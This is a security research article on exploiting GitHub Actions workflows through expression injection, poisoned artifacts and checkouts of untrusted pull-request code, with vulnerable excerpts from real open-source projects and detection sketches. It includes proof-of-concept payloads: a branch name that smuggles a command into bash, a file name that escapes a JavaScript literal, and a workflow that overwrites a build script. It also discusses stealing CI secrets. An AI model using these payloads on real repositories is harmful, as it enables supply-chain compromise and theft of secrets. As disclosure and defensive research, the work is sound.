GitHub Actions exploitation: untrusted input

In the previous article, we explored the mechanics of GitHub Actions and the various elements present in a GitHub workflow. For example, we explained how permissions are managed, how workflows are triggered and the security implications of some dangerous triggers. We also detailed the security protections that need to be bypassed to perform exploitation.

In this article, we will outline three common misconfigurations that can be exploited to gain write access to the targeted repository or extract sensitive secrets. Each of them will be illustrated with real vulnerabilities we found in open source projects such as Microsoft, FreeRDP, AutoGPT, Ant-Design, Cypress, Excalidraw and others.

Expression injection

Each workflow trigger comes with an associated GitHub context, offering comprehensive information about the event that initiated it. This includes details about the user who triggered the event, the branch name, and other relevant contextual information. Certain components of this event data, such as the base repository name, or pull request number, cannot be manipulated or exploited for injection by the user who initiated the event (e.g., in the case of a pull request). This ensures a level of control and security over the information provided by the GitHub context during workflow execution.

However, some elements can be controlled by an attacker and should be sanitized before being used. Here is the list of such elements, provided by GitHub:

- github.event.issue.title
- github.event.issue.body
- github.event.pull_request.title
- github.event.pull_request.body
- github.event.comment.body
- github.event.review.body
- github.event.pages.*.page_name
- github.event.commits.*.message
- github.event.head_commit.message
- github.event.head_commit.author.email
- github.event.head_commit.author.name
- github.event.commits.*.author.email
- github.event.commits.*.author.name
- github.event.pull_request.head.ref
- github.event.pull_request.head.label
- github.event.pull_request.head.repo.default_branch
- github.head_ref
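As a rough illustration of how this list can be put to use, the Python sketch below flags `${{ ... }}` expressions in a `run` script that reference one of the elements above. The function name `find_untrusted_expressions` and both regular expressions are assumptions made for this example; it is a simplification and not a complete scanner.

```python
import re
from fnmatch import fnmatchcase

# Context elements listed above as attacker-controllable.
UNTRUSTED_PATTERNS = [
    "github.event.issue.title",
    "github.event.issue.body",
    "github.event.pull_request.title",
    "github.event.pull_request.body",
    "github.event.comment.body",
    "github.event.review.body",
    "github.event.pages.*.page_name",
    "github.event.commits.*.message",
    "github.event.head_commit.message",
    "github.event.head_commit.author.email",
    "github.event.head_commit.author.name",
    "github.event.commits.*.author.email",
    "github.event.commits.*.author.name",
    "github.event.pull_request.head.ref",
    "github.event.pull_request.head.label",
    "github.event.pull_request.head.repo.default_branch",
    "github.head_ref",
]

# Hypothetical helpers: a ${{ ... }} expression, and a dotted context path inside it.
EXPRESSION = re.compile(r"\$\{\{(.*?)\}\}", re.DOTALL)
CONTEXT_PATH = re.compile(r"[A-Za-z_][\w-]*(?:\.(?:[\w-]+|\*))+")


def find_untrusted_expressions(run_script):
    """Return the untrusted context paths used inside ${{ }} in a run script."""
    findings = []
    for expression in EXPRESSION.finditer(run_script):
        for path in CONTEXT_PATH.findall(expression.group(1)):
            if any(fnmatchcase(path, pattern) for pattern in UNTRUSTED_PATTERNS):
                findings.append(path)
    return findings


print(find_untrusted_expressions('echo "${{ github.event.issue.title }}"'))
# ['github.event.issue.title']
```

Elements such as the pull request number are not in the list, so an expression using only those is not reported.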

Apache



For instance, branch 1.2 of the Apache Superset repository contains a vulnerable example:

However, since this vulnerable code is not present on the default branch it is not exploitable. This kind of vulnerability is already known and is less common nowadays.

The AutoGPT repository was affected by this vulnerability. The ci.yml workflow of the branch release-v0.4.7 is configured with a dangerous pull_request_target trigger:

File: ci.yml

01: name: Python CI

02:

03: on:

04: push:

05: branches: [ master, ci-test* ]

06: paths-ignore:

07: - 'tests/Auto-GPT-test-cassettes'

08: - 'tests/challenges/current_score.json'

09: pull_request:

10: branches: [ stable, master, release-* ]

11: pull_request_target:

12: branches: [ master, release-*, ci-test* ]

As explained in our previous article, the pull_request_target trigger means that anyone, even an external user, can trigger this workflow simply by opening a pull request.

At line 110, the expression ${{ github.event.pull_request.head.ref }} is used. This expression holds the name of the pull request's head branch, which is concatenated directly into the bash script without any sanitization:

File: ci.yml

107: - name: Checkout cassettes

108: if: ${{ startsWith(github.event_name, 'pull_request') }}

109: run: |

110: cassette_branch="${{ github.event.pull_request.user.login }}-${{ github.event.pull_request.head.ref }}"

111: cassette_base_branch="${{ github.event.pull_request.base.ref }}"





With a branch name such as ";{echo,aWQK}|{base64,-d}|{bash,-i};echo", it is possible to get arbitrary code execution:
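To see why this branch name works, recall that the expression is replaced by its value before bash ever parses the script. The Python sketch below mimics that replacement with a plain string substitution (a deliberate simplification of what the runner does) and decodes the base64 part of the payload. The `render` helper and the `attacker` login are hypothetical, and the sketch assumes that the surrounding double quotes are part of the branch name.

```python
import base64


def render(template, context):
    """Naive stand-in for expression expansion: plain text replacement."""
    for name, value in context.items():
        template = template.replace("${{ " + name + " }}", value)
    return template


# Line 110 of ci.yml, as shown above.
line_110 = (
    'cassette_branch="${{ github.event.pull_request.user.login }}'
    '-${{ github.event.pull_request.head.ref }}"'
)

context = {
    "github.event.pull_request.user.login": "attacker",  # hypothetical account
    "github.event.pull_request.head.ref": '";{echo,aWQK}|{base64,-d}|{bash,-i};echo"',
}

rendered = render(line_110, context)
decoded = base64.b64decode("aWQK").decode()

print(rendered)       # the line bash actually receives
print(repr(decoded))  # the command hidden in the payload
```

In the rendered line, the first double quote of the branch name closes the string assignment. Bash brace expansion then turns `{echo,aWQK}` into `echo aWQK`, so the decoded command (`id`) is piped into an interactive bash.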

An attacker allowed to execute arbitrary code in this context could get a reverse shell inside the runner and exfiltrate the following secret variables:

File: ci.yml

160: env:

161: CI: true

162: PROXY: ${{ github.event_name == 'pull_request_target' && secrets.PROXY || '' }}

163: AGENT_MODE: ${{ github.event_name == 'pull_request_target' && secrets.AGENT_MODE || '' }}

164: AGENT_TYPE: ${{ github.event_name == 'pull_request_target' && secrets.AGENT_TYPE || '' }}

165: OPENAI_API_KEY: ${{ github.event_name != 'pull_request_target' && secrets.OPENAI_API_KEY || '' }}

[...]

175: run: |

177: base64_pat=$(echo -n "pat:${{ secrets.PAT_REVIEW }}" | base64 -w0)

For more information on secret extraction, please refer to these articles [1][2].

Moreover, since the contents: write permission is explicitly granted, the attacker would also be able to modify the code of the AutoGPT project.

File: ci.yml

79: permissions:

80: # Gives the action the necessary permissions for publishing new

81: # comments in pull requests.

82: pull-requests: write

83: # Gives the action the necessary permissions for pushing data to the

84: # python-coverage-comment-action branch, and for editing existing

85: # comments (to avoid publishing multiple comments in the same PR)

86: contents: write

AutoGPT is ranked as the 24th most starred GitHub repository, so its compromise could have had far-reaching consequences for a substantial number of users.

We also found another vulnerability affecting the same workflow; more on this in the last section. After reporting these issues to the AutoGPT team, we learned that both were already known: a security company had independently found [3] the same vulnerabilities. Although they were fixed on the main branch, the repository was still vulnerable, because a pull_request_target workflow can be exploited from any branch and not only from the default branch.
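The reason a fix on the default branch is not enough can be sketched as follows: for pull_request_target, the workflow file is taken from the base branch of the pull request, and the branches filter is matched against that base branch. The Python snippet below approximates the filter from line 12 of ci.yml with `fnmatch`, which is only a rough stand-in for GitHub's own glob matching; the function name is hypothetical.

```python
from fnmatch import fnmatchcase

# Branch filter of the pull_request_target trigger (ci.yml, line 12).
TARGET_BRANCH_FILTERS = ["master", "release-*", "ci-test*"]


def pull_request_target_fires(base_branch):
    """Approximate check: does a PR opened against base_branch match the filter?"""
    return any(fnmatchcase(base_branch, pattern) for pattern in TARGET_BRANCH_FILTERS)


print(pull_request_target_fires("release-v0.4.7"))  # True
print(pull_request_target_fires("stable"))          # False
```

A pull request opened against release-v0.4.7 therefore runs that branch's copy of ci.yml, vulnerable steps included.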

The previous dangerous context element list provided by GitHub can also be extended with other potentially dangerous context elements. We often encounter workflows using the following context elements directly in a run script:

run: |
  echo ${{ steps.step-name.outputs.value }}
  echo ${{ needs.job.outputs.value }}
  echo ${{ env.ENV_VAR }}

If an attacker manages to control one of these values by exploiting a workflow, this would result in arbitrary command execution. This is why the previous list should be enhanced with these elements:

- env.*
- steps.*.outputs.*
- needs.*.outputs.*



This vulnerability can be found with octoscan [4], a static vulnerability scanner for GitHub Actions workflows. Here is an example showing how this tool can help identify this misconfiguration:

You can see that the tool also detects other vulnerabilities; more on this in the last part of this article.

Microsoft

Here is another example with the Microsoft repository generative-ai-for-beginners.

The workflow validate-markdown.yml is configured with a dangerous pull_request_target trigger. It also performs a dangerous checkout with a reference to the forked repository that can be controlled by an attacker:

File: validate-markdown.yml

22: steps:

23: - name: Checkout Repo

24: uses: actions/checkout@v3

25: with:

26: ref: ${{ github.event.pull_request.head.sha }}

Then, the action-check-markdown action is executed:

File: validate-markdown.yml

27: - name: Check broken Paths

28: id: check-broken-paths

29: uses: john0isaac/action-check-markdown@v1.0.0

30: with:

31: command: check-broken-paths

32: directory: ./

33: github-token: ${{ secrets.GITHUB_TOKEN }}



Finally, the result of the action-check-markdown is concatenated inside a GitHub script action (line 49):

File: validate-markdown.yml

36: uses: actions/github-script@v6

37: with:

38: github-token: ${{ secrets.GITHUB_TOKEN }}

39: script: |

40: github.rest.issues.createComment({

41: issue_number: context.issue.number,

42: owner: context.repo.owner,

43: repo: context.repo.repo,

44: body: `

45: We have automatically detected the following broken relative paths in your lessons.

46: Please check the file paths and associated broken paths inside them.

47: Learn more from our [contributing guide](https://github.com/microsoft/generative-ai-for-beginners/blob/main/CONTRIBUTING.md).

48: # Check Broken Paths

49: ${{ env.BROKEN_PATHS }}

50: `

51: })

It is possible to gain arbitrary code execution in this workflow by crafting a malicious .md file that generates a malicious value for the BROKEN_PATHS variable, which is then injected into the GitHub script action.

First the repository is forked by an attacker and a PR is made with a malicious markdown file named `}); console.log('pwn') ; console.log({a:`.md:

[](https://github.com/john0isaac/markdown-checker/issues}\\))aaaaa

This file is broken and will trigger an error when action-check-markdown is executed. Running markdown-checker --dir ./ --func 'check_urls_tracking' produces the following report:

| File Full Path | Issues |
|--------|--------|
|<code>/tmp/a/`}); console.log('pwn') ; console.log({a:`.md</code>|<code>['https://github.com/john0isaac/markdown-checker/issues}\\\\', 'https://github.com/john0isaac/markdown-checker/pulls', 'https://github.com/marketplace/actions/check-markdown']</code>|

Since this report is concatenated into the GitHub script action, console.log('pwn') will be executed.
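The breakout relies on the backticks in the file name closing the JavaScript template literal that holds the comment body. The Python sketch below makes this visible by splitting the rendered script on backticks and keeping the parts that fall outside a template literal. The `code_segments` helper is hypothetical and deliberately naive, and `TEMPLATE` is an abbreviated stand-in for the real script body.

```python
def code_segments(js_source):
    """Naively return the parts of js_source lying outside backtick-delimited
    template literals (escapes, quotes and comments are ignored)."""
    return js_source.split("`")[0::2]


# Abbreviated stand-in for the script body shown above (lines 40 to 51).
TEMPLATE = "github.rest.issues.createComment({ body: `\n${{ env.BROKEN_PATHS }}\n` })"

# Start of the report row produced for the malicious file name.
broken_paths = "|<code>/tmp/a/`}); console.log('pwn') ; console.log({a:`.md</code>|"

rendered = TEMPLATE.replace("${{ env.BROKEN_PATHS }}", broken_paths)
for segment in code_segments(rendered):
    print(repr(segment))
```

With a harmless value the script has two code segments, before and after the literal. With the crafted file name a third one appears in the middle, and it contains the attacker's `console.log('pwn')` call.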

Although GitHub published a blog post [5] in 2020 on preventing this kind of vulnerability, it is still possible to find such issues.

Dangerous artifacts

It is common practice to use artifacts to pass data between different workflows. We often encounter this with the workflow_run trigger where the triggering workflow will prepare some data that will then be sent to the triggered workflow. Given the untrusted nature of this artifact data, it is crucial to treat it with caution and recognize it as a potential threat. The vulnerability arises from the fact that external entities, such as malicious actors, can influence the content of the artifact data.



The visual-regression-diff-finish.yml workflow of the ant-design repository was found to be vulnerable to this kind of attack.

It is configured with a workflow_run trigger:

File: visual-regression-diff-finish.yml

3: name: 👀 Visual Regression Diff Finish

4:

5: on:

6: workflow_run:

7: workflows: ["👀 Visual Regression Diff Build"]

8: types:

9: - completed

A checkout is performed to download the legitimate code from the repository:

File: visual-regression-diff-finish.yml

59: steps:

60: - name: checkout

61: uses: actions/checkout@v4

The workflow then downloads some artifacts from the triggering workflow by using the dawidd6/action-download-artifact action:

File: visual-regression-diff-finish.yml

63: # We need get persist-index first

64: - name: download image snapshot artifact

65: uses: dawidd6/action-download-artifact@v2

66: with:

67: workflow: ${{ github.event.workflow_run.workflow_id }}

68: run_id: ${{ github.event.workflow_run.id }}

69: name: visual-regression-diff-ref

[...]

76: # Download report artifact

77: - name: download report artifact

78: id: download_report

[...]

80: uses: dawidd6/action-download-artifact@v2

81: with:

82: workflow: ${{ github.event.workflow_run.workflow_id }}

83: run_id: ${{ github.event.workflow_run.id }}

84: name: visual-regression-report

This action is very popular and is used in many workflows. The initiating workflow can upload artifacts using the actions/upload-artifact action, while the subsequent workflow can retrieve the artifact as a zip file using the dawidd6/action-download-artifact action. If no directory is specified, the artifact is automatically unzipped in the current directory. The action retrieves artifacts by name, but the actual zip file can contain anything.

Finally, a JavaScript file is executed:

File: visual-regression-diff-finish.yml

087: - name: upload visual-regression report

088: id: report

089: env:

090: ALI_OSS_AK_ID: ${{ secrets.ALI_OSS_AK_ID }}

091: ALI_OSS_AK_SECRET: ${{ secrets.ALI_OSS_AK_SECRET }}

092: PR_ID: ${{ steps.pr.outputs.id }}

093: run: |

[...]

103: node scripts/visual-regression/upload.js ./visualRegressionReport --ref=pr-$PR_ID

A malicious user could trigger this workflow with malicious versions of the artifacts. Since the workflow does not check the content of the artifacts, it is possible to overwrite the file scripts/visual-regression/upload.js initially obtained via the checkout step.
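The overwrite can be reproduced locally. The Python sketch below builds a throwaway workspace and a crafted zip archive, then lists the archive members that would replace files already present, which is the kind of check the workflow does not perform. The helper names and file contents are made up for the example, and a real artifact would be fetched through the GitHub API rather than built in memory.

```python
import io
import tempfile
import zipfile
from pathlib import Path


def overwritten_files(artifact_zip, workspace):
    """List archive members that would replace a file already present in workspace."""
    hits = []
    with zipfile.ZipFile(artifact_zip) as archive:
        for member in archive.namelist():
            if not member.endswith("/") and (Path(workspace) / member).is_file():
                hits.append(member)
    return hits


def demo():
    """Build a throwaway workspace and a crafted archive, then compare them."""
    with tempfile.TemporaryDirectory() as workspace:
        # File that the checkout step would have put in place.
        script = Path(workspace, "scripts", "visual-regression", "upload.js")
        script.parent.mkdir(parents=True)
        script.write_text("// legitimate script from the checkout\n")

        # Archive mimicking the attacker's artifact layout.
        crafted = io.BytesIO()
        with zipfile.ZipFile(crafted, "w") as archive:
            archive.writestr("scripts/visual-regression/upload.js", "// attacker code\n")
            archive.writestr("package.json", "{}")
        crafted.seek(0)
        return overwritten_files(crafted, workspace)


print(demo())
```

Only the member whose path collides with a checked-out file is reported; unzipping such an archive in the current directory silently replaces that file.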

First the attacker forks the repository, then proceeds to create the following workflow:

name: 👀 Visual Regression Diff Build
on:
  pull_request:
jobs:
  visual-diff-report:
    name: visual-diff report
    runs-on: ubuntu-latest
    steps:
      - name: prepare
        run: |
          # empty file to be compliant
          mkdir visual-regression-ref
          touch visual-regression-ref/empty.txt
          tar -czvf visualRegressionReport.tar.gz visual-regression-ref/
          # add the malicious upload.js file
          mkdir visual
          mkdir -p visual/scripts/visual-regression/
          echo 'console.log("pwn");' > visual/scripts/visual-regression/upload.js
          # to pass the rm package.json
          touch visual/package.json
      - name: upload report artifact
        uses: actions/upload-artifact@v3
        with:
          name: visual-regression-report
          path: visualRegressionReport.tar.gz
      - name: Upload persist key
        uses: actions/upload-artifact@v3
        with:
          name: visual-regression-diff-ref
          path: visual/*

When the pull request is created, this workflow will be launched and will in turn trigger the vulnerable visual-regression-diff-finish.yml workflow. It will download the malicious artifacts and the upload.js script will be overwritten:

In this context an attacker could exfiltrate the Alibaba cloud access keys:

File: visual-regression-diff-finish.yml

87: - name: upload visual-regression report

88: id: report

89: env:

90: ALI_OSS_AK_ID: ${{ secrets.ALI_OSS_AK_ID }}

91: ALI_OSS_AK_SECRET: ${{ secrets.ALI_OSS_AK_SECRET }}



Our tool octoscan is also able to detect this kind of vulnerability:

Here is another good example [6] of this kind of exploitation: a company found a vulnerability in a workflow of the rust-lang repository.

Dangerous checkouts

Automated processing of pull requests (PRs) originating from external forks carries inherent risks, and it is imperative to handle such PRs with caution, treating them as untrusted input. Conventional CI/CD practices involve checking that a new PR does not break the project build, does not introduce functional regressions, and passes the tests, but these automated behaviors can pose a security risk when dealing with untrusted PRs.

Such security issues can occur when a developer uses the workflow_run or the pull_request_target triggers. Workflows started by these triggers run in a privileged context: they have read access to secrets and potentially write access to the targeted repository. Performing an explicit checkout of the untrusted code results in the attacker's code being downloaded into that context.



Here is a vulnerable example from the Cypress repository. The semantic-pull-request.yml workflow is configured with a dangerous pull_request_target trigger:

File: semantic-pull-request.yml

1: name: "Semantic Pull Request"

2:

3: on:

4: pull_request_target:

5: types:

6: - opened

7: - edited

8: - synchronize

At line 18, the workflow then performs a dangerous checkout with a reference to the forked repository, which can be controlled by an attacker:

File: semantic-pull-request.yml

15: - name: Checkout

16: uses: actions/checkout@v3

17: with:

18: ref: ${{ github.event.pull_request.head.ref }}

19: repository: ${{ github.event.pull_request.head.repo.full_name }}

The expression ${{ github.event.pull_request.head.ref }} references the forked repository. During the checkout process, the workflow will retrieve code from the forked repository, which may potentially include malicious files.
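The pattern described here, a privileged trigger combined with a checkout of the pull request's head, can be spotted mechanically. The Python sketch below works on a workflow that is assumed to be already parsed into a dictionary. The function names and the job name `main` are placeholders, and the check is intentionally minimal: for instance, it does not follow a reference computed in an earlier step.

```python
PRIVILEGED_TRIGGERS = {"pull_request_target", "workflow_run"}
# Expressions that resolve to the pull request's head, i.e. attacker-controlled code.
HEAD_MARKERS = ("github.event.pull_request.head.", "github.head_ref")


def triggers(workflow):
    """Normalize the three forms of `on`: string, list or mapping."""
    on = workflow.get("on", {})
    return {on} if isinstance(on, str) else set(on)


def dangerous_checkouts(workflow):
    """Return (job, ref) pairs where a privileged workflow checks out PR head code."""
    if not PRIVILEGED_TRIGGERS & triggers(workflow):
        return []
    findings = []
    for job_name, job in workflow.get("jobs", {}).items():
        for step in job.get("steps", []):
            ref = str(step.get("with", {}).get("ref", ""))
            if step.get("uses", "").startswith("actions/checkout@") and any(
                marker in ref for marker in HEAD_MARKERS
            ):
                findings.append((job_name, ref))
    return findings


# Already-parsed form of the excerpts above; the job name "main" is a placeholder.
cypress = {
    "on": {"pull_request_target": {"types": ["opened", "edited", "synchronize"]}},
    "jobs": {"main": {"steps": [
        {"name": "Checkout", "uses": "actions/checkout@v3", "with": {
            "ref": "${{ github.event.pull_request.head.ref }}",
            "repository": "${{ github.event.pull_request.head.repo.full_name }}",
        }},
        {"run": "npm install"},
    ]}},
}
print(dangerous_checkouts(cypress))
```

The same steps under a plain pull_request trigger are not reported, since that trigger does not run in the privileged context.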

Since the attacker-controlled code is downloaded inside the runner, it is possible to gain arbitrary code execution through the npm install command:

File: semantic-pull-request.yml

20: - run: npm install

21: working-directory: scripts/github-actions/semantic-pull-request/

First the repository is forked by an attacker and a PR is made with a malicious package.json file:

When the PR is created the workflow semantic-pull-request.yml will be triggered and the malicious script will be executed:

In this example, the GITHUB_TOKEN has write permissions on the repository, so an attacker could push arbitrary code and compromise many users, as this repository is widely used.

Again here is an example with octoscan:

AutoGPT

As previously explained, the AutoGPT repository was also affected by this vulnerability. The ci.yml workflow of the branch release-v0.4.7 is configured with a dangerous pull_request_target trigger and a dangerous checkout with a reference to the fork repository is performed in the following step:

File: ci.yml

28: - name: Checkout repository

29: uses: actions/checkout@v3

30: with:

31: fetch-depth: 0

32: ref: ${{ github.event.pull_request.head.ref }}

33: repository: ${{ github.event.pull_request.head.repo.full_name }}

Then, some python packages are installed:

File: ci.yml

50: - name: Install dependencies

51: run: |

52: python -m pip install --upgrade pip

53: pip install -r requirements.txt

A malicious user could trigger this workflow with a malicious version of the requirements.txt file.



First the repository is forked by an attacker and an evil package is created. A crafted requirements.txt file is also included in the pull request:



When the pull request is created, the ci.yml workflow is automatically launched and the setup.py script is executed:

For the attack to work, the attacker only needs to open the PR against the release-v0.4.7 branch. The vulnerable workflow is then triggered without any interaction, bypassing the first-time contributor protection.

Excalidraw

The autorelease-preview.yml workflow of the excalidraw repository is configured with an issue_comment trigger:

File: autorelease-preview.yml

2: on:

3: issue_comment:

4: types: [created, edited]

The only condition to trigger the workflow is to make a specific comment:

File: autorelease-preview.yml

8: name: Auto release preview

9: if: github.event.comment.body == '@excalibot trigger release' && github.event.issue.pull_request
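Note that this condition only looks at the comment text and at whether the issue is a pull request; it never looks at who wrote the comment. The Python sketch below mirrors the expression on a trimmed-down issue_comment payload. The payload values are invented for the example, and `job_condition` is a hypothetical name.

```python
def job_condition(event):
    """Mirror of the `if:` expression on line 9 of autorelease-preview.yml."""
    return (
        event["comment"]["body"] == "@excalibot trigger release"
        and bool(event["issue"].get("pull_request"))
    )


# Trimmed-down issue_comment payload; all values are invented for the example.
event_from_stranger = {
    "comment": {
        "body": "@excalibot trigger release",
        "author_association": "NONE",  # commenter has no tie to the repository
    },
    "issue": {"number": 1, "pull_request": {"url": "https://example.invalid/pr/1"}},
}

print(job_condition(event_from_stranger))  # True
```

The `author_association` field is present in the payload but plays no part in the decision, so a comment from any user satisfies the condition.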

Then a reference to the commit id of the pull request is obtained with a GitHub script action:

File: autorelease-preview.yml

20: uses: actions/github-script@v4

21: with:

22: result-encoding: string

23: script: |

24: const { owner, repo, number } = context.issue;

25: const pr = await github.pulls.get({

26: owner,

27: repo,

28: pull_number: number,

29: });

30: return pr.data.head.sha

This reference is then used to perform a checkout. Note that this reference points to the head commit of the PR coming from the fork repository.

File: autorelease-preview.yml

31: - uses: actions/checkout@v2

32: with:

33: ref: ${{ steps.sha.outputs.result }}

34: fetch-depth: 2

Finally, the yarn package manager is used:

File: autorelease-preview.yml

44: - name: Auto release preview

45: id: "autorelease"

46: run: |

47: yarn add @actions/core

48: yarn autorelease preview ${{ github.event.issue.number }}

A malicious user could trigger this workflow with a malicious .yarnrc.yml file.



First the repository is forked by an attacker and a malicious .yarnrc.yml is created along with a malicious JavaScript file:

Then a pull request is created, and the following comment is made:



The vulnerable workflow is automatically launched, and the malicious code is executed:

This workflow is quite sensitive as it contains the NPM_TOKEN used to push code on npmjs.org:

File: autorelease-preview.yml

39: - name: Set up publish access

40: run: |

41: npm config set //registry.npmjs.org/:_authToken ${NPM_TOKEN}

42: env:

43: NPM_TOKEN: ${{ secrets.NPM_TOKEN }}

At the time of writing, the excalidraw package has 56k weekly downloads, so such a compromise could impact a significant number of users.

Apache Doris

The code-checks.yml workflow of the branch branch-deltalake of the Apache Doris repository is configured with a dangerous pull_request_target trigger:

File: code-checks.yml

18: name: Code Checks

19:

20: on: [push, pull_request_target]

A checkout is then performed with a reference to the head commit of the PR coming from the fork repository:

File: code-checks.yml

33: - name: Checkout ${{ github.ref }} ( ${{ github.event.pull_request.head.sha }} )

34: if: ${{ github.event_name == 'pull_request_target' }}

35: uses: actions/checkout@v3

36: with:

37: ref: ${{ github.event.pull_request.head.sha }}

38: submodules: recursive

A patch is applied to a local file at line 43:

File: code-checks.yml

40: - name: Patch

41: run: |

42: pushd .github/actions/action-sh-checker >/dev/null

43: sed -i 's/\[ "$GITHUB_EVENT_NAME" == "pull_request" \]/\[\[ "$GITHUB_EVENT_NAME" == "pull_request" || "$GITHUB_EVENT_NAME" == "pull_request_target" \]\]/' entrypoint.sh

44: popd >/dev/null

Note that on the default branch this step is different and prevents any exploitation.

Finally, the local action downloaded from the checkout step is executed:

File: code-checks.yml

46: - name: Run ShellCheck

47: uses: ./.github/actions/action-sh-checker

48: env:

49: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

A malicious user could trigger this workflow with a malicious version of the local action .github/actions/action-sh-checker. Since the workflow checks out the attacker's code from a forked repository, it would be possible to gain arbitrary code execution inside this workflow. For the attack to work, the attacker only needs to open the PR against the branch-deltalake branch, and the vulnerable workflow will be triggered.

The same vulnerability was also found in FreeRDP [7], where we managed to gain arbitrary write access to the repository. We also found it in the Angular repository, where the exploitation is the same: a bash script from the forked repository is downloaded and executed.

Conclusion

This article highlights three common misconfigurations in GitHub workflows that can be leveraged to obtain write access to the targeted repository or extract sensitive secrets. We illustrated these vulnerabilities using real-world instances from popular open-source projects such as Microsoft, FreeRDP, AutoGPT, Excalidraw, Angular, Apache, Cypress and others. In the next blog post, we will explore additional attack vectors leading to similar consequences.

We also introduced octoscan, a static vulnerability scanner for GitHub Actions workflows. You can find it on our GitHub [4].

- 1. https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/

- 2. https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and…

- 3. https://github.com/CycodeLabs/raven/tree/main?tab=readme-ov-file#hall-o…

- 4. https://github.com/synacktiv/octoscan

- 5. https://securitylab.github.com/research/github-actions-preventing-pwn-r…

- 6. https://www.legitsecurity.com/blog/artifact-poisoning-vulnerability-dis…

- 7. https://github.com/FreeRDP/FreeRDP/pull/10209